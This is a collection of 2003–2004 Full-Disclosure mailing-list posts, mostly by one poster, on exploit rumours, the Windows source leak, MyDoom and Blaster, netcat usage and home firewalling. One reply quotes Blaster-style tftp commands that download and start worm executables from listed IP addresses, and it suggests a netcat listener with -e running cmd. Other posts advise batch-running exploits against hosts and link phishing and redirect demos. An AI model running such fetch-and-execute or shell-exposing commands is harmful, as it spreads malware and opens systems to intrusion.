every one is blabbling about some new mirc 6.14 dcc exploit. Is this true? has any body confirmed this? http://searchirc.com/boards/viewtopic.php?t=1115 http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=mirc+6.14+exploitbtnG=Go ogle+Search i like Google© m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SHUT THE FUCK UP
I'd like to suggest everybody starts sending an annoying mail back to the poster of useless crap like this AND NOT TO THE LIST. I try to make a habit of sending n00b mail to the AV notices i recieve as someone on this list has / does get infected, my address gets spoofed, and mr.N00bular with GheeWhizzSpamAntiVirusPopupblocker© e-mail gateway/firewall/av utility spits out assinine mail to me that contributes to a total waste of bandwith, and a loss of time® for all partis concerned. my two bits Donnie Werner http://exploitlabs.com time® is a trademark of Universe© Public use permited by fair use agreement ( copyright [NULL] ) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: text
However, in this case, *I* sent the virus. I had the word t e x t . p i f in the body of my message (without the spaces, of course), and the poorly configured AV scanners detected a virus. about as funny as this ( http://lists.netsys.com/pipermail/full-disclosure/2003-May/005244.html ) when I sent a text message with only viri / worm names in it. I should generate a new one to see what comes out the other end D.Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] winxp home expusure
Hi, How bad is it to have Win XP HOME at work - in LAN ? I ask for security reasons - I just logged off in winxp home from vncviewer and it said -closing all network connections ...- and my vnc connection still remained active :)? sometimes winXP's tcp parameters keep a connection open for 4 minutes or more. try using tcpview.exe ( www.sysinternals.com/ntw2k/source/tcpview.shtml ) also, some programs dont exit clean, etc etc... Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] HOTMAIL / PASSPORT: phishing expedition
buddyiframe src=http://www.malware.com/pithy.html; so could this url be considered a phishing scam ? regardless of your implied intent? It does pretend to be a genuine login, and i am sure you are collecting successfull attempts to a log ( right? ). Has your demo oversteped the bounds of security research into the realm of collecting confidental ( login / password ) information for purposes of access circumvention ? currious, Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft Security, baby steps ?
Gimme a break.. http://go.microsoft.com/?LinkID=422101 although this could be amusing... http://www.microsoft.com/security/protect/cd/order.asp m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Caching a sniffer
How can i know if there a sniffer running in my network? When you wake up one day to find that you're 0wn3d :-) Seriously, about the only way I can think of to detect a sniffer with its transmit leads cut is with a Time Domain Reflectometer (TDR) and look for an unexplained impedance bump. try your detection tools on a simple sniffer at http://exploitlabs.com/files/misc/xsniff.zip does not use pcap or any other cap libs that I am aware of. m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] mydoom.c information
bascially looking for sync-src-1.00.tbz. That message was posted to this avail on infected hosts This is how I came to be in possession of it: nc -l -p 3127 doomjuice.dump You will probably want to write a loop to restart netcat because it exits after a successful transfer. nc -L -p 3127 out.txt note: -L will not exit your netcat, as it is for a persistant listener. please see http://lists.netsys.com/pipermail/full-disclosure/2004-February/017126.html as i do not wish to type-iterate. Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] mydoom.c information
Now I'm confused... [EMAIL PROTECTED] /storage/virii] $ nc -h GNU netcat 0.7.1, a rewrite of the famous networking tool. Basic usages: connect to somewhere: nc [options] hostname port [port] ... listen for inbound:nc -l -p port [options] [hostname] [port] ... tunnel to somewhere: nc -L hostname:port -p port [options] Mandatory arguments to long options are mandatory for short options too. Options: -c, --closeclose connection on EOF from stdin -e, --exec=PROGRAM program to exec after connect -g, --gateway=LIST source-routing hop point[s], up to 8 -G, --pointer=NUM source-routing pointer: 4, 8, 12, ... -h, --help display this help and exit -i, --interval=SECSdelay interval for lines sent, ports scanned -l, --listen listen mode, for inbound connects -L, --tunnel=ADDRESS:PORT forward local port to remote address /* snip */ Does persistent listener == tunnel? hmm.. my netcat is different and i compiled from Hobbit's sources.. snip --- C:\Documents and Settings\Administratornc -h [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, background mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] --- snip note: -L listen harder, re-listen on socket close mabey confusion rules the day? or your GNU netcat 0.7.1, a rewrite of the famous networking tool. netcat really sucks Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Scary Question
I heard that it was possible to cause irrepareable damage to any electronic circuit through certain waves or radio emissions ( I'm not qualified in this subject ). ESD Google is my friend.. http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=esd make him yours. D.Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Re: GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution
Many of these systems come from the vendor with default shares enabled allowing anonymous access, no patches, default passwords, no anti-virus, etc. Many health-care organizations then proceed to plug them into the general network and pretend that nothing's wrong. ahem... this is not a windows issue. Sounds like you need a vendor that does its job, not just VAR you to death and leave you to your own destruction.. Donnie Werner [EMAIL PROTECTED] http://exploitlabs.com 360-312-8011 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] trust? - win2k source code tools
NOW EVERY EXECUTABLE IS TRUSTED AND DIGITALY SIGNED found this interesting... \win2k\private\inet\mshtml\build\scripts\tools\x86 iexpress.exe signcode.exe makecert.exe ( DigSig.dll ) ( in fast food voice ) and who would you like your package to be certified from today sir? \win2k\private\ispu\pkitrust\initpki\certs\ looks like the viri / trojan kiddies will have some fun with this. yikes to PE format executables. alas... i could be wrong, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution
IE6 is not vulnerable, so I guess I'll get back to work. My Warhol worm will have to wait a bit... Dunno but your message crashes OE on (pre)view. no warning, no nothin... OE just *bink* closes NICE JOB [EMAIL PROTECTED] guess those sources are good for something huh ( , ubber biscuit? ) m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution
please enlighten us on your versions numbers / patch levels wood. -KF morning_wood wrote: Dunno but your message crashes OE on (pre)view. no warning, no nothin... OE just *bink* closes NICE JOB [EMAIL PROTECTED] Symtoms were reported using the following: Windows XP Pro ( Gold SP0 ) OE Version = 6.00.2600.(xpclient 010817-1148) dll's not matching version sig: csapi3t1.dll unknown mshtml.dll6.00.2734.1600 msoe.dll 6.00.2720.3000 msoeacct.dll6.00.2800.1123 msoert2.dll 6.00.2800.1123 ole32.dll 5.1.2600.115(xpclient_qfe.021108-2107 riched20.dll 5.30.23.1210 riched32.dll 5.1.2600.0(xpclient 010817-1148) wab32.dll unknown wab32res.dll unknown note: I was forced to go to hotmail via the web interface, and manualy delete the message to restore function. further, my Security tab in options is set to Internet Zone ( less secure ) on the account in question. One more note of observance in OE6, each account can be independantly set for security zones even in a single user machine. I now check security settings on every account per machine ( not user login ) , however I have not noted if the settings are inherited from the current IE security settings at the time of account creation ( but would explain my different settings accross 6 accounts on a single usder box ). Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: HelpCtr - allow open any page or run
win2k sp4 does not work Help Center only ships with Me, XP and Win2k3 btw.. UNCONFIRMED in Xp Pro Sp0 m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: W2K source leaked?
it has been leaked , also for the winnt 4 and the windows XP sourcecode files like : windows.2000.source.code-IND are now roaming irc channels and webpages ... it is an hard day for microsoft i guess I have seen these files... personaly I find it hard to belive the NT / 2k base is bigger that a 200mb zip. What it does look like is a core subset of some parts of windows with sources. I can bet that what is in the release was heavily audited and not realy a loss in anyones book. my2bits Donnie Werner [EMAIL PROTECTED] http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Funny, I thought I mailed FULL DISCLOSURE
- Original Message - From: Lyris ListManager [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Wednesday, February 11, 2004 5:49 PM Subject: Message rejected Return-Path: [EMAIL PROTECTED] Received: from smarthost3.mail.uk.easynet.net ([212.135.6.13]) by listserv.patchmanagement.org with SMTP (Lyris ListManager WIN32 version 7.8b); Wed, 11 Feb 2004 20:49:06 -0500 Received: from spirahellicmultimedia-11.dsl.easynet.co.uk ([212.135.176.251] helo=spirasecondary.spirainternal.co.uk) by smarthost3.mail.uk.easynet.net with esmtp (Exim 4.10) id 1Ar5uh-0005g3-00 for [EMAIL PROTECTED]; Thu, 12 Feb 2004 01:45:11 + Received: from spiramain.spirainternal.co.uk ([10.0.0.150]) by spirasecondary.spirainternal.co.uk (Lotus Domino Release 5.0.8) with ESMTP id 2004021201445193:5736 ; Thu, 12 Feb 2004 01:44:51 + Received: from mail pickup service by spiramain.spirainternal.co.uk with Microsoft SMTPSVC; Thu, 12 Feb 2004 01:45:09 + Delivered-To: spirah-spira:co:[EMAIL PROTECTED] X-Envelope-To: [EMAIL PROTECTED] Received: (qmail 75370 invoked from network); 12 Feb 2004 01:40:24 - Received: from outgoing2.securityfocus.com (205.206.231.26) by raitax.pair.com with SMTP; 12 Feb 2004 01:40:24 - Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing2.securityfocus.com (Postfix) with QMQP id 51E2B9113D; Wed, 11 Feb 2004 07:54:59 -0700 (MST) Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm Precedence: bulk List-Id: bugtraq.list-id.securityfocus.com List-Post: mailto:[EMAIL PROTECTED] List-Help: mailto:[EMAIL PROTECTED] List-Unsubscribe: mailto:[EMAIL PROTECTED] List-Subscribe: mailto:[EMAIL PROTECTED] Delivered-To: mailing list [EMAIL PROTECTED] Delivered-To: moderator for [EMAIL PROTECTED] Received: (qmail 14774 invoked from network); 10 Feb 2004 22:07:52 - X-Originating-IP: [4.65.224.219] X-Originating-Email: [EMAIL PROTECTED] X-Sender: [EMAIL PROTECTED] From: morning_wood [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED] References: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure! Date: Tue, 10 Feb 2004 20:14:08 -0800 MIME-Version: 1.0 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2720.3000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300 Message-ID: [EMAIL PROTECTED] X-OriginalArrivalTime: 11 Feb 2004 04:14:53.0320 (UTC) FILETIME=[99693080:01C3F055] X-MIMETrack: Itemize by SMTP Server on spirasecondary/SpiraHellic(Release 5.0.8 |June 18, 2001) at 02/12/2004 01:44:51 AM, Serialize by Router on spirasecondary/SpiraHellic(Release 5.0.8 |June 18, 2001) at 02/12/2004 01:44:52 AM, Serialize complete at 02/12/2004 01:44:52 AM Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=iso-8859-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ms04-007 Scan tool?
Does anyone know of a vulnerability scanner yet? I found a nessus plugin but all it does is check the registry for the existence of the patch. Thanks, Jeff try looking for open port 3127 or even open up a netcat ( thanks Hobbit ) listener nc -L -n -v -p 3127 also do the same for RPC-DCOM aka msblaster heres a sample... tftp -i 4.65.168.122 GET msblast.exe start msblast.exe msblast.exe tftp -i 4.65.174.100 GET mslaugh.exe start mslaugh.exe mslaugh.exe tftp -i 192.168.1.12 GET teekids.exe start teekids.exe teekids.exe tftp -i 4.65.194.212 GET enbiei.exe start enbiei.exe enbiei.exe .. yes there are 4 variants. to get infected ( capture one ) try netcat with the -e to call cmd.com listening on port as well... fun trick. morning_wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FD foobar?
feb - 2006 ??? feb - 2005 ??? http://lists.netsys.com/pipermail/full-disclosure/ sorted by date. The Full-Disclosure Archives You can get more information about this list or you can download the full raw archive ( 92 MB ). ArchiveView by:Downloadable version 2006-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Text 1 KB ] 2005-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 500 bytes ] 2004-October:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 677 bytes ] 2004-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 507 KB ] 2004-January:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ] 2003-December:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ] 2003-November:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ] there is atleast one post in the bad yeasrs that I did not recieve via normal list email, and i thought this might have something to do with it. any others experience this? m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure!
been applied. We have scanned with Retina, Foundstone and Qualys tools which they all showed as VULNERABLE, however when we scanned with Microsoft Base Security Analyzer it showed as NOT VULNERABLE. This was at first confusing; one would think an assessment tool released by the original did you try exploit code to verify? that should dispel any ambiguity across scanner reports, it would be real easy to load your network hosts into a batch file or shell script and see how many roots you get. just a thought... eliminates alot of guesswork.. ( imo ) m.wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Virus infect on single user
I noticed that the file was last modified a day that i ddin't open my pc. Is there any change for that file to have attributes than the real one? not uncommon for date manipulation with trojans. Beast 2.05 uses activeX startup routines and file date manipulation of the files ( files are dated 8/23/2001 ). Donnie Werner [EMAIL PROTECTED] http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] * in url
dunno if this is new but.. http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Alleged IT security extortion plot against BestBuy.com
http://www.startribune.com/stories/535/4304797.html in re-reading this article i was presented with an offer to subscribe/signup/register to the StarTribune when re-clicking on the above link. The redirected url is http://24hour.startribune.com/login/?goto=http://www.startribune.com/stories/535 /4304797.html To access startribune.com content and features, you must be a registered member. Becoming a registered member is fast and FREE. Just fill out the following information and you'll have access to all startribune.com offers, including content, features, newsletters, contests, special offers and Talk. Let's get started. Deleting the cookie restores the link to the article without the signup. cookie: [EMAIL PROTECTED] m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] OnStar backdoor in your car...
The FBI and other police agencies may not eavesdrop on conversations inside automobiles equipped with OnStar or similar dashboard computing systems... http://news.com.com/2100-1029_3-5109435.html uhhh... Big brother is now m. wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
On Thu, 1 Jan 2004 22:41:35 - [EMAIL PROTECTED] wrote: [snip] Fully self-contained harmless *.exe: http://www.malware.com/exe-cute-html.zip [snip] This doesn't look like self-executing HTML - anyway. Gives dialog box to open or save a blabla.hta and no, it does not self-execute even under low security settings. try again Jelmer? morning_wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
Your post isn't verry informative what kind of system did you test it on? It worked on my fully patched windows XP WinXp Sp0 IE6 010817-1148 running http://microsoft.bbs.us/malware.html; i get only a webpage with junkware and no file(s) on my hd. running malware.html locally does produce the desired results, but then again... i can get any html to execute locally calling a remote location for the code, as long as its run from the local machine. m.w00d ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WinME firewalling
Actualy winMe is quite safe out of the box ( its win9x ) and does not have the remote compromises that affect winXP / win2k Donnie Werner E2 Labs - Original Message - From: j [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 10, 2003 6:33 AM Subject: [Full-Disclosure] WinME firewalling I'm interested in opinions from list participants - all my work is with linux, like a firewalling linux bridge on a win/lin mixed network. Given: A technologically-impaired grandmother with winME. Any change of OS would be psychologically damaging... (WinXP 'kindergarten crayon' default theme would probably induce seizures... ;^) Grandma now gets a DSL connection, and as per the ISP has this shiny new DSL modem plugged into said WinME machine, both now powered up ~24 hours per day, an open orifice with a target painted on it. What software firewall solution is truly suitable for Grandma? As invisible to the user as possible, of course, since this Grandma doesn't understand most of the 'little window thingies' that spontaneously appear already. (you know at least one - the manic 'ok' clicker...) Additional hardware of any kind is not permitted, this has to be a software solution under WinME. Clearly there are 'social' factors in training such a user - I'm looking for opinions regarding the software end of things, not 'whack her in the head every time she clicks OK without reading' suggestions. :^) Thanks. j --- MCP - Defenestrator - Cynic ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WinME firewalling
yes, excuse *cough* my not mentioning the IE vunerabilities, ... details... details. Comparativly, putting a win9x based box on a open internet connection, without browsing in Internet Explorer, is safer than a win XP / 2K box ( as we saw without even logging in as i had pointed out, just before LSD release of RPC exploit code ) on the same connection. So go buy grandma winME, and update to the latest non IE or patched IE 6, no fancy-smanshy firewall or setup pains needed oh and set her Outlook Express to disable HTML to view mail. and no kazza ( p2p ) or the elderlys favorite, Bonzi Buddy (but mr technician... he talks to me) for crying out loud Donnie Werner [EMAIL PROTECTED] - Original Message - From: [EMAIL PROTECTED] To: morning_wood [EMAIL PROTECTED] Cc: j [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Monday, November 10, 2003 8:44 AM Subject: Re: [Full-Disclosure] WinME firewalling ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE object vulnerability
ever try google? http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=eeye+objectbtnG=Google+Search morning_wood - Original Message - From: Ahmad Naazir [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Wednesday, November 05, 2003 2:06 PM Subject: [Full-Disclosure] IE object vulnerability hey actually I want the code of the file http://morningwood.ethicsdesign.com/fucked4test.asp can anyone give it to me _ The new MSN 8: smart spam protection and 2 months FREE* http://join.msn.com/?page=features/junkmail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE obvject vuln
it is a demo of the object tag exploit code, asp is server side script that does not render in the browser, that is why you cant see it. morning_wood - Original Message - From: Ahmad Naazir [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, November 04, 2003 3:09 PM Subject: [Full-Disclosure] IE obvject vuln Can anyone tell me about IE object vuln wat kind of asp file is used morningwood.ethicsdesign.com/cmd.asp _ Add photos to your e-mail with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
